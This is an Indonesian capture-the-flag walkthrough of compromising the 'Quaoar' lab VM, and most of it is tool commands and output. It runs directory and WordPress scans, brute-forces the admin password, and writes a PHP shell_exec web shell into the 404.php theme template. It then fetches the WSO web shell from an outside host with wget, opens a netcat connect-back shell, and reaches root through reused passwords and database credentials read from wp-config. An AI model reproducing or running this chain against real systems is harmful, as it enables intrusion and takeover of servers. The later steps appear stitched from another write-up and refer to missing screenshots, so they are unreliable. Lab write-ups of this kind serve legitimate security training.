                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/start/ ----
+ http://192.168.0.122/upload/admins/start/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/admins/start/index.php (CODE:302|SIZE:0)                                                                                                                                                           
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/support/ ----
+ http://192.168.0.122/upload/admins/support/index (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/support/index.php (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/templates/ ----
+ http://192.168.0.122/upload/admins/templates/details (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/templates/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/upload/admins/templates/install (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/templates/uninstall (CODE:302|SIZE:0)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/users/ ----
+ http://192.168.0.122/upload/admins/users/add (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/admins/users/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/admins/users/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/users/save (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/admins/users/users (CODE:302|SIZE:0)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/framework/functions/ ----
+ http://192.168.0.122/upload/framework/functions/index (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/framework/functions/index.php (CODE:302|SIZE:0)                                                                                                                                                    
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/yui/ ----
==> DIRECTORY: http://192.168.0.122/upload/include/yui/event/                                                                                                                                                                    
+ http://192.168.0.122/upload/include/yui/index (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/include/yui/index.php (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/include/yui/README (CODE:200|SIZE:8488)                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/include/yui/yahoo/                                                                                                                                                                    
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/ ----
+ http://192.168.0.122/upload/modules/news/add (CODE:403|SIZE:82)                                                                                                                                                                
+ http://192.168.0.122/upload/modules/news/comment (CODE:302|SIZE:0)                                                                                                                                                             
==> DIRECTORY: http://192.168.0.122/upload/modules/news/css/                                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/delete (CODE:403|SIZE:85)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/icon (CODE:200|SIZE:1058)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/modules/news/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/modules/news/info (CODE:403|SIZE:83)                                                                                                                                                               
+ http://192.168.0.122/upload/modules/news/info.php (CODE:403|SIZE:83)                                                                                                                                                           
+ http://192.168.0.122/upload/modules/news/install (CODE:403|SIZE:86)                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/modules/news/languages/                                                                                                                                                               
+ http://192.168.0.122/upload/modules/news/modify (CODE:403|SIZE:85)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/rss (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/modules/news/search (CODE:403|SIZE:85)                                                                                                                                                             
==> DIRECTORY: http://192.168.0.122/upload/modules/news/templates/                                                                                                                                                               
+ http://192.168.0.122/upload/modules/news/uninstall (CODE:403|SIZE:88)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/news/upgrade (CODE:403|SIZE:86)                                                                                                                                                            
+ http://192.168.0.122/upload/modules/news/view (CODE:403|SIZE:83)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/ ----
+ http://192.168.0.122/upload/modules/wysiwyg/add (CODE:403|SIZE:85)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/wysiwyg/delete (CODE:403|SIZE:88)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/wysiwyg/icon (CODE:200|SIZE:1058)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/wysiwyg/index (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/index.php (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/modules/wysiwyg/info (CODE:403|SIZE:86)                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/info.php (CODE:403|SIZE:86)                                                                                                                                                        
+ http://192.168.0.122/upload/modules/wysiwyg/install (CODE:403|SIZE:89)                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/languages/                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/modify (CODE:403|SIZE:88)                                                                                                                                                          
+ http://192.168.0.122/upload/modules/wysiwyg/save (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/modules/wysiwyg/search (CODE:403|SIZE:88)                                                                                                                                                          
==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/templates/                                                                                                                                                            
+ http://192.168.0.122/upload/modules/wysiwyg/upgrade (CODE:403|SIZE:89)                                                                                                                                                         
+ http://192.168.0.122/upload/modules/wysiwyg/view (CODE:403|SIZE:86)                                                                                                                                                            
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/page/posts/ ----
+ http://192.168.0.122/upload/page/posts/index (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/page/posts/index.php (CODE:302|SIZE:0)                                                                                                                                                             
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/temp/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/templates/blank/ ----
+ http://192.168.0.122/upload/templates/blank/index (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/templates/blank/index.php (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/templates/blank/info (CODE:403|SIZE:86)                                                                                                                                                            
+ http://192.168.0.122/upload/templates/blank/info.php (CODE:403|SIZE:86)                                                                                                                                                        
+ http://192.168.0.122/upload/templates/blank/preview (CODE:200|SIZE:1377)                                                                                                                                                       
+ http://192.168.0.122/upload/templates/blank/template (CODE:200|SIZE:507)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/network/ ----
+ http://192.168.0.122/wordpress/wp-admin/network/about (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/admin (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-admin/network/credits (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/edit (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/wordpress/wp-admin/network/index (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-admin/network/menu (CODE:500|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/wordpress/wp-admin/network/plugins (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/profile (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/settings (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/wordpress/wp-admin/network/setup (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/sites (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-admin/network/themes (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/network/update (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/network/upgrade (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/network/users (CODE:302|SIZE:0)                                                                                                                                                        
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/user/ ----
+ http://192.168.0.122/wordpress/wp-admin/user/about (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/user/admin (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/user/credits (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/wordpress/wp-admin/user/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/user/menu (CODE:500|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/user/profile (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/plugins/ ----
+ http://192.168.0.122/wordpress/wp-content/plugins/hello (CODE:500|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-content/plugins/index (CODE:200|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                                                                                  
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/themes/ ----
+ http://192.168.0.122/wordpress/wp-content/themes/index (CODE:200|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                                                                                   
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/login/forgot/ ----
+ http://192.168.0.122/upload/admins/login/forgot/index (CODE:200|SIZE:2531)                                                                                                                                                     
+ http://192.168.0.122/upload/admins/login/forgot/index.php (CODE:200|SIZE:2531)                                                                                                                                                 
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/yui/event/ ----
+ http://192.168.0.122/upload/include/yui/event/event (CODE:200|SIZE:87537)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/event/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/include/yui/event/index.php (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/event/README (CODE:200|SIZE:9807)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/yui/yahoo/ ----
+ http://192.168.0.122/upload/include/yui/yahoo/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/include/yui/yahoo/index.php (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/yahoo/README (CODE:200|SIZE:2889)                                                                                                                                                      
+ http://192.168.0.122/upload/include/yui/yahoo/yahoo (CODE:200|SIZE:35223)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/css/ ----
+ http://192.168.0.122/upload/modules/news/css/backend (CODE:200|SIZE:1416)                                                                                                                                                      
+ http://192.168.0.122/upload/modules/news/css/frontend (CODE:200|SIZE:1771)                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/css/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/modules/news/css/index.php (CODE:302|SIZE:0)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/languages/ ----
+ http://192.168.0.122/upload/modules/news/languages/index (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/languages/index.php (CODE:302|SIZE:0)                                                                                                                                                 
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/templates/ ----
==> DIRECTORY: http://192.168.0.122/upload/modules/news/templates/backend/                                                                                                                                                       
+ http://192.168.0.122/upload/modules/news/templates/index (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/upload/modules/news/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                 
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/languages/ ----
+ http://192.168.0.122/upload/modules/wysiwyg/languages/index (CODE:302|SIZE:0)                                                                                                                                                  
+ http://192.168.0.122/upload/modules/wysiwyg/languages/index.php (CODE:302|SIZE:0)                                                                                                                                              
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.0.122/upload/modules/wysiwyg/templates/ ----
+ http://192.168.0.122/upload/modules/wysiwyg/templates/index (CODE:302|SIZE:0)                                                                                                                                                  
+ http://192.168.0.122/upload/modules/wysiwyg/templates/index.php (CODE:302|SIZE:0)                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/news/templates/backend/ ----
+ http://192.168.0.122/upload/modules/news/templates/backend/index (CODE:302|SIZE:0)                                                                                                                                             
+ http://192.168.0.122/upload/modules/news/templates/backend/index.php (CODE:302|SIZE:0)                                                                                                                                         
                                                                                                                                                                                                                                 
-----------------
END_TIME: Mon Jan 23 21:35:16 2023
DOWNLOADED: 258272 - FOUND: 252


Disini bisa dilihat terdapat 3 file/folder penting yaitu

/upload
/wordpress
/robots.txt

Akses robot.txt di URL

http://192.168.0.122/robots.txt

keluar tulisan,

Disallow: Hackers
Allow: /wordpress/
   ____                              
#  /___ \_   _  __ _  ___   __ _ _ __ 
# //  / / | | |/ _` |/ _ \ / _` | '__|
#/ \_/ /| |_| | (_| | (_) | (_| | |   
#\___,_\ \__,_|\__,_|\___/ \__,_|_|   
                                    

Akses /upload

http://192.168.0.122/upload/

Ada LEPTON CMS, tapi sulit untuk diakses karena menggunakan IP 192.168.0.190.

Wordpress Scanning

Scan Wordpress,

wpscan --url http://192.168.0.122/wordpress --enumerate u

hasilnya,

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|  

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.122/wordpress/ [192.168.0.122]
[+] Started: Mon Jan 23 21:45:40 2023  

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.2.22 (Ubuntu)
 |  - X-Powered-By: PHP/5.3.10-1ubuntu3
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.122/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ 

[+] WordPress readme found: http://192.168.0.122/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.122/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.122/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299 

[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.0.122/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
 |  - http://192.168.0.122/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>  

[+] WordPress theme in use: twentyfourteen
 | Location: http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | [!] The version is out of date, the latest version is 3.5
 | Style URL: http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
 | Style Name: Twenty Fourteen
 | Style URI: http://wordpress.org/themes/twentyfourteen
 | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
 | Author: the WordPress team
 | Author URI: http://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14, Match: 'Version: 1.1'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 
<====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wpuser
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register 

[+] Finished: Mon Jan 23 21:45:46 2023
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 15.813 KB
[+] Data Received: 231.31 KB
[+] Memory used: 186.273 MB
[+] Elapsed time: 00:00:05

Wordpress Bruteforce password

Coba bruteforce,

wpscan --url http://192.168.0.122/wordpress --passwords /usr/share/wordlists/rockyou.txt --usernames admin -t 50

setelah beberapa lama, hasilnya,

.........
[+] Performing password attack on Xmlrpc Multicall against 1 user/s
[SUCCESS] - admin / admin                                                                                                                                                                                                         
All Found                                                                                                                                                                                                                         
Progress Time: 00:01:41 <                                                                                                                                                                     
> (40 / 28688)  0.13%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: admin

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 23 21:55:08 2023
[+] Requests Done: 185
[+] Cached Requests: 39
[+] Data Sent: 52.958 KB
[+] Data Received: 4.135 MB
[+] Memory used: 338.531 MB
[+] Elapsed time: 00:01:58
                             

Tampaknya

username admin
password admin

Inject cmd vulnerability

Coba login ke

http://192.168.0.122/wordpress/wp-login.php

Masuk ke

Appearance > Editor > 404 Template (404.php)

Masukan

<?php
/**
 * The template for displaying 404 pages (Not Found)
 *
 * @package WordPress
 * @subpackage Twenty_Fourteen
 * @since Twenty Fourteen 1.0
 */

echo "

";
 echo shell_exec($_GET['cmd']);
 echo "

";

exit();

get_header(); ?>

Jangan lupa di Save setelah di tambahkan. Lakukan command injection lewat URL,

http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=pwd;%20ls%20-lah;%20id

Jika berhasil akan keluar,

/var/www/wordpress/wp-content/themes/twentyfourteen
total 864K
drwxr-xr-x 9 www-data www-data 4.0K Oct 12  2016 .
drwxr-xr-x 5 www-data www-data 4.0K Oct 16  2016 ..
-rw-r--r-- 1 www-data www-data  823 Jan 23 22:30 404.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 archive.php
-rw-r--r-- 1 www-data www-data 1.9K Oct 12  2016 author.php
-rw-r--r-- 1 www-data www-data 1.5K Oct 12  2016 category.php
-rw-r--r-- 1 www-data www-data 2.3K Oct 12  2016 comments.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-aside.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-audio.php
-rw-r--r-- 1 www-data www-data 1.1K Oct 12  2016 content-featured-post.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-gallery.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-image.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-link.php
-rw-r--r-- 1 www-data www-data  961 Oct 12  2016 content-none.php
-rw-r--r-- 1 www-data www-data  871 Oct 12  2016 content-page.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-quote.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content-video.php
-rw-r--r-- 1 www-data www-data 2.2K Oct 12  2016 content.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 css
-rw-r--r-- 1 www-data www-data  946 Oct 12  2016 featured-content.php
-rw-r--r-- 1 www-data www-data  728 Oct 12  2016 footer.php
-rw-r--r-- 1 www-data www-data  16K Oct 12  2016 functions.php
drwxr-xr-x 3 www-data www-data 4.0K Oct 12  2016 genericons
-rw-r--r-- 1 www-data www-data 2.3K Oct 12  2016 header.php
-rw-r--r-- 1 www-data www-data 2.6K Oct 12  2016 image.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 images
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 inc
-rw-r--r-- 1 www-data www-data 1.6K Oct 12  2016 index.php
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 js
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 languages
drwxr-xr-x 2 www-data www-data 4.0K Oct 12  2016 page-templates
-rw-r--r-- 1 www-data www-data 1.2K Oct 12  2016 page.php
-rw-r--r-- 1 www-data www-data  16K Oct 12  2016 rtl.css
-rw-r--r-- 1 www-data www-data 603K Oct 12  2016 screenshot.png
-rw-r--r-- 1 www-data www-data 1.3K Oct 12  2016 search.php
-rw-r--r-- 1 www-data www-data  340 Oct 12  2016 sidebar-content.php
-rw-r--r-- 1 www-data www-data  395 Oct 12  2016 sidebar-footer.php
-rw-r--r-- 1 www-data www-data  848 Oct 12  2016 sidebar.php
-rw-r--r-- 1 www-data www-data 1.1K Oct 12  2016 single.php
-rw-r--r-- 1 www-data www-data  74K Oct 12  2016 style.css
-rw-r--r-- 1 www-data www-data 1.6K Oct 12  2016 tag.php
-rw-r--r-- 1 www-data www-data 2.4K Oct 12  2016 taxonomy-post_format.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Inject WSO Shell

Download

https://github.com/mIcHyAmRaNe/wso-webshell/blob/master/wso.php
https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php
https://raw.githubusercontent.com/tennc/webshell/master/xakep-shells/PHP/wso.txt

Copy paste ke /home/kali/Downloads/wso.txt Rename

cp wso.php wso.txt

Upload,

http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=curl%20--data%20"@/home/kali/Downloads/wso.txt"%20<%20wso.txt
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=cat%20wso.txt
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=mv wso.txt wso.php


Kita pakai wget untuk upload shell.. tapi shell harus berformat txt Smile

Quote: localhost/cmd.php?cmd=wget http://files.xakep.biz/shells/PHP/wso.txt

trus rename wso.txt menjadi wso.php Quote: localhost/cmd.php?cmd=mv wso.txt wso.php


Yep berhasil! Upload WSO Shell, saya anggap kalian para pembaca sudah tau ya bagaimana caranya xD. Basically gunakan wget atau curl untuk download file


WSO Shell, silahkan yang mau jalan2 Saatnya connectback shell, tinggal jalankan perintah nc -lvp 31337, dan buka bagian network. Masukkan IP kamu dan jadilah shell seperti ini


Perlu diingat! jangan lupa jalankan 2 perintah ini ketika sudah berhasil connect back

$ python -c "import pty; pty.spawn('/bin/bash');" $ export TERM=xterm Privilege Escalation (getting common user) Silahkan baca output dari linuxprivchecker.py. Ada hal yang menarik dari versi kernel tersebut

[+] Kernel

   Linux version 3.2.0-23-generic-pae (buildd@palmer) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu4) ) #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012

Dan ketika saya ingin kompile dan jalankan exploit, hal yang saya takutkan benar-benar terjadi

www-data@Quaoar:/var/www/wordpress/wp-content/themes/twentyfourteen$ gcc The program 'gcc' can be found in the following packages:

  • gcc
  • pentium-builder

Ask your administrator to install one of them Oh my god! Tapi saya tidak menyerah, saya cari di https://www.kernel-exploits.com/kernel/?version=3.2.0 dan menemukan exploit yang cocok. Namun ketika dijalankan


Padahal sudah chmod +x sebelumnya Hmm, sekarang kita coba baca kembali /etc/passwd dari linuxprivchecker. Terdapat user wpadmin seperti ini

[+] All users

   root:x:0:0:root:/root:/bin/bash
   daemon:x:1:1:daemon:/usr/sbin:/bin/sh
   bin:x:2:2:bin:/bin:/bin/sh
   sys:x:3:3:sys:/dev:/bin/sh
   sync:x:4:65534:sync:/bin:/bin/sync
   games:x:5:60:games:/usr/games:/bin/sh
   man:x:6:12:man:/var/cache/man:/bin/sh
   lp:x:7:7:lp:/var/spool/lpd:/bin/sh
   mail:x:8:8:mail:/var/mail:/bin/sh
   news:x:9:9:news:/var/spool/news:/bin/sh
   uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
   proxy:x:13:13:proxy:/bin:/bin/sh
   www-data:x:33:33:www-data:/var/www:/bin/sh
   backup:x:34:34:backup:/var/backups:/bin/sh
   list:x:38:38:Mailing List Manager:/var/list:/bin/sh
   irc:x:39:39:ircd:/var/run/ircd:/bin/sh
   nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
   libuuid:x:100:101::/var/lib/libuuid:/bin/sh
   syslog:x:101:103::/home/syslog:/bin/false
   mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
   messagebus:x:103:107::/var/run/dbus:/bin/false
   whoopsie:x:105:112::/nonexistent:/bin/false

....

   wpadmin:x:1001:1001::/home/wpadmin:/bin/sh

Pada password admin wordpress tadi, username & password semuanya sama. Apakah ini juga berlaku pada user wpadmin? mengapa kita tidak coba


Loh ternyata berhasil beneran!!! XD XD

Anyway, saya coba iseng decrypt flag md5 itu dan ternyata tidak ditemukan. Saya coba masukin ke root tapi sepertinya bukan itu passwordnya.

Privilege Escalation (getting root) Karena saya tidak menemukan jalan lain selain bruteforce, namun tentunya pusing juga kalau bruteforce rootnya karena /etc/shadow tidak dapat dibuka.

Akhirnya saya coba iseng melihat konfigurasi wordpress, siapa tau password rootnya adalah password database server

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');

Lalu saya cobakan saja password rootpassword! pada root


Okay! berhasil sudah sampai disini, yey!!!

Epilogue Terus terang aja sih, ini VM sebenarnya gampang cuma malesinnya adalah maenan bruteforce dan tebak password.

Tentunya walaupun mudah, ini juga merupakan hal yang sulit buat kalian yang masih baru dalam dunia hacking. Tebak password itu bisa gw bilang salah satu “skill dewa” karena kamu harus punya sense yang bagus untuk itu.

Paling segitu dulu saja, stay tuned untuk artikel lainnya yah! :D

Referensi